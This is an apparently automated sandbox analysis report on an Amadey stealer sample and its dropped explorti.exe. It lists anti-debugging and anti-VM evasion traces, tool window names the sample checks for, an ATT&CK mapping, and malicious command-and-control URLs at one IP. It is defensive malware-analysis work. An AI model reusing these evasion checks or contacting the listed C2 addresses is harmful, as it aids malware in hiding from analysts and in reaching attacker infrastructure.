Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50002E9 second address: 500030F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF1Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500030F second address: 500031F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DABCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500031F second address: 5000323 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000323 second address: 5000352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C4BE13h 0x0000000e jmp 00007F5F64D1DAC7h 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000352 second address: 5000356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000356 second address: 500035C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 500035C second address: 5000366 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 04EFCBAFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 5000366 second address: 50003AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jne 00007F5FD6C4BDEAh 0x0000000d pushad 0x0000000e mov dx, ax 0x00000011 movzx esi, di 0x00000014 popad 0x00000015 test bl, 00000007h 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007F5F64D1DAC1h 0x00000021 sbb ax, C3C6h 0x00000026 jmp 00007F5F64D1DAC1h 0x0000002b popfd 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0815 second address: 4FF082C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop eax 0x00000006 popad 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov di, 8F7Ch 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0929 second address: 4FF09B0 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 207181C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DAC3h 0x00000012 jmp 00007F5F64D1DAC3h 0x00000017 popfd 0x00000018 jmp 00007F5F64D1DAC8h 0x0000001d popad 0x0000001e mov esi, dword ptr [ebp+08h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov esi, ebx 0x00000026 pushfd 0x00000027 jmp 00007F5F64D1DAC9h 0x0000002c sbb cx, 9DE6h 0x00000031 jmp 00007F5F64D1DAC1h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF09B0 second address: 4FF09FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF1Dh 0x00000012 adc eax, 0250CDF6h 0x00000018 jmp 00007F5F64D1DF21h 0x0000001d popfd 0x0000001e mov edi, eax 0x00000020 popad 0x00000021 test esi, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 movsx ebx, cx 0x00000029 push ecx 0x0000002a pop ebx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF09FC second address: 4FF0A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 23h 0x00000005 pushfd 0x00000006 jmp 00007F5F64D1DAC4h 0x0000000b add cl, 00000078h 0x0000000e jmp 00007F5F64D1DABBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 je 00007F5FD6C5341Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov esi, edi 0x00000022 call 00007F5F64D1DAC7h 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0A4C second address: 4FF0A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5F64D1DF27h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0A86 second address: 4FF0ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, F20Ah 0x00000007 movsx edx, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, esi 0x0000000f pushad 0x00000010 call 00007F5F64D1DAC8h 0x00000015 movzx eax, bx 0x00000018 pop edx 0x00000019 movzx ecx, di 0x0000001c popad 0x0000001d je 00007F5FD6C533A3h 0x00000023 jmp 00007F5F64D1DABFh 0x00000028 test byte ptr [76FB6968h], 00000002h 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 mov ah, bh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0ADA second address: 4FF0AE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0AE0 second address: 4FF0B80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5FD6C53384h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5F64D1DAC7h 0x00000015 jmp 00007F5F64D1DAC3h 0x0000001a popfd 0x0000001b mov ebx, esi 0x0000001d popad 0x0000001e mov edx, dword ptr [ebp+0Ch] 0x00000021 pushad 0x00000022 jmp 00007F5F64D1DAC0h 0x00000027 popad 0x00000028 push ebx 0x00000029 jmp 00007F5F64D1DABCh 0x0000002e mov dword ptr [esp], ebx 0x00000031 pushad 0x00000032 mov cl, B7h 0x00000034 mov esi, edx 0x00000036 popad 0x00000037 push ebp 0x00000038 pushad 0x00000039 mov eax, 5FC2C5A7h 0x0000003e movzx esi, di 0x00000041 popad 0x00000042 mov dword ptr [esp], ebx 0x00000045 jmp 00007F5F64D1DABFh 0x0000004a push dword ptr [ebp+14h] 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007F5F64D1DAC5h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0C2B second address: 4FF0C59 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5F64D1DF20h 0x00000012 adc ah, 00000078h 0x00000015 jmp 00007F5F64D1DF1Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 4FF0C59 second address: 4FF0C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50009C1 second address: 50009EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DF1Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50806DA second address: 50806E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	RDTSC instruction interceptor: First address: 50806E0 second address: 50806E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 73EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 73EB40 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 73C70E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Special instruction interceptor: First address: 8DE5BC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 77EA41 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 77EB40 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 77C70E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 91E5BC instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Code function: 0_2_05070205 rdtsc

0_2_05070205

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Window / User API: threadDelayed 394

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7976	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7976	Thread sleep time: -68034s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7996	Thread sleep time: -60030s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8000	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8000	Thread sleep time: -64032s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960	Thread sleep count: 394 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960	Thread sleep time: -11820000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8076	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7960	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000	Jump to behavior

Source: explorti.exe, explorti.exe, 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2891529475.0000000001238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: f3wrBtIYXx.exe, 00000000.00000002.1697951868.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1724071406.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1730181139.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000007.00000002.2890744078.0000000000901000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Code function: 0_2_05070621 Start: 05070690 End: 0507068C

0_2_05070621

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Code function: 0_2_05070205 rdtsc

0_2_05070205

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0074645B mov eax, dword ptr fs:[00000030h]		7_2_0074645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_0074A1C2 mov eax, dword ptr fs:[00000030h]		7_2_0074A1C2

Source: C:\Users\user\Desktop\f3wrBtIYXx.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe	Binary or memory string: qMProgram Manager
Source: f3wrBtIYXx.exe, 00000000.00000002.1697951868.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1724071406.0000000000901000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1730181139.0000000000901000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: qMProgram Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0072D312 cpuid

7_2_0072D312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_0072CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_0072CB1A

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_007165B0 LookupAccountNameA,

7_2_007165B0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.explorti.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.explorti.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f3wrBtIYXx.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1697881645.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1683597722.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2332657432.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1730102498.0000000000711000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1689899976.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1657646956.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1723999610.0000000000711000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2890600546.0000000000711000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	251 Virtualization/Sandbox Evasion	LSASS Memory	741 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	12 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	251 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	224 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
f3wrBtIYXx.exe	55%	Virustotal		Browse
f3wrBtIYXx.exe	100%	Avira	TR/Crypt.TPM.Gen
f3wrBtIYXx.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	55%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://185.215.113.19/Vi9leo/index.phpyM	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpuM	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpeb8a7	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpC:	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpx	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpWindows	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php	2%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpm32	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php3M	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpx	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpon	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpm32	3%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpmM	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php#f	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpon	18%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.php#	100%	Avira URL Cloud	malware
http://185.215.113.19/Vi9leo/index.php0x	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php#	2%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpPy;	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpoft	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.php#f	2%	Virustotal		Browse
http://185.215.113.19/Vi9leo/index.phpk	100%	Avira URL Cloud	phishing
http://185.215.113.19/Vi9leo/index.phpk	19%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.php	true	2%, Virustotal, Browse Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.19/Vi9leo/index.phpyM	explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpC:	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpuM	explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpeb8a7	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpWindows	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpx	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpm32	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.php3M	explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpon	explorti.exe, 00000007.00000002.2891529475.00000000011BB000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://185.215.113.19/Vi9leo/index.phpmM	explorti.exe, 00000007.00000002.2891529475.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
